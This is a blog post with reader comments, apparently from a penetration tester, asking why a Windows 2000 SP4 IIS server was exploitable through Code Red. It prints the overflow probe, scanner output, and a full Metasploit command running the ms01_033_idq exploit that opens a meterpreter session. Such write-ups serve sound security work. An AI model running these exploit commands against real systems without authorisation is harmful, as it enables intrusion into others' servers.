Idq / Code Red wierdness
On a recent pen test I encountered a wierd thing. I discovered a code red vulnerability on a web server using a custom scanner that I modified from source. The check for code red sends the GET /x.ida (220 A’s) =x HTTP/1.0\r\n\r\n and checks for the string “c0000005″ in the return.
So, my app shows:
[root@TC06 framework-3.0-beta-3]# /mnt/usb/web_checker x.x.x.x | grep “[+]” | grep -v [*]
[+]Vulnerable to iis Bad directory: WEB_IIS_SAMPLE_FILES
[+]Vulnerable to iis Bad directory: WEB_IIS_SAMPLE_FILES
[+]Vulnerable to iis bad file: WEB_IIS_MSADC_EXISTS : /msadc/msadcs.dll
[+]Vulnerable to iis bad file: WEB_FP_EXTS_ENABLED : /_vti_bin/shtml.dll
[+]Vulnerable to iis bad file: WEB_FP_EXTS_ENABLED : /_vti_bin/shtml.exe
[+] .printer’ ISAPI filter extension enabled.
[+]Vulnerable to iis bad file: WEB_IIS_IDAIDQ_MAPPED : /asdf.idq
[+]Vulnerable to iis bad file: WEB_IIS_HTW_MAPPED : /asdf.htw
[+]Vulnerable to IIS CODE RED!
Cool, a Code red… a few years late, but whatever. So, we have code red, idq files are mapped… this server is potentially vulnerable. But wait, I thought code red was patched with windows 2000 service pack 3.
Let’s see what’s up:
msf > use scanner/smb/version
msf auxiliary(version) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(version) > run
[*] x.x.x.x is running Windows 2000 Service Pack 4 with MS05-010+
[*] Auxiliary module execution completed
msf auxiliary(version)>
So, we have windows 2000, service pack 4 according to metasploits smb module.
Yet, I still have multiple scanners reporting it vulnerable. Talking with the customer, and my boss I get the go ahead to attempt the exploit.
[root@TC06 framework-3.0-beta-3]# ./msfcli exploit/windows/iis/ms01_033_idq PAYLOAD=windows/meterpreter/bind_tcp RHOST=x.x.x.x TARGET=1 LPORT=1972 E
[*] Started bind handler
[*] Trying target Windows 2000 English SP1-SP2…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73739 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.x:32979 -> x.x.x.x:1972)
meterpreter > sysinfo
Computer: seeminglyvulnhost
OS : Windows 2000 (Build 2195, Service Pack 4).
meterpreter>
So, we are successfuly at exploiting, delivering our payload and we bring up sysinfo on the box to find in fact it is service pack 4.
What I’m trying to figure out is:
1. Why is it vulnerable? The only logical thing that has come up is a restore of the server after the service packs and the ida and idq files being over written.
2. If the assumption of restore was correct, the module is only written to handle sp0-2. y0 made the call ebx pull from the idq.dll. So, it shouldnt work on anything > sp2 right?
any idea’s?
3 Comments »
RSS feed for comments on this post. TrackBack URI
Maybe they installed IIS after they installed Service Pack 4. You know in Windows 2000 you have to reinstall the service pack every time you install a new app…
I think it was concluded that the iis site/installation was restored from a backup. Even if they installed iis after SP4 it should have been corrected.
An Admin may have removed the URLScan/IIS lockdown protections. They often do that when they think it’s stopping some application from working properly.
I think if ulrscan, for instance, was removed then the mapping ot .idq (and others) is present, yet the sever may still be at the correct patch level.
I remember that even after having a fully patche win2k sp4 server, all the articles still told one to run Urlscan and/or IIS lockdown.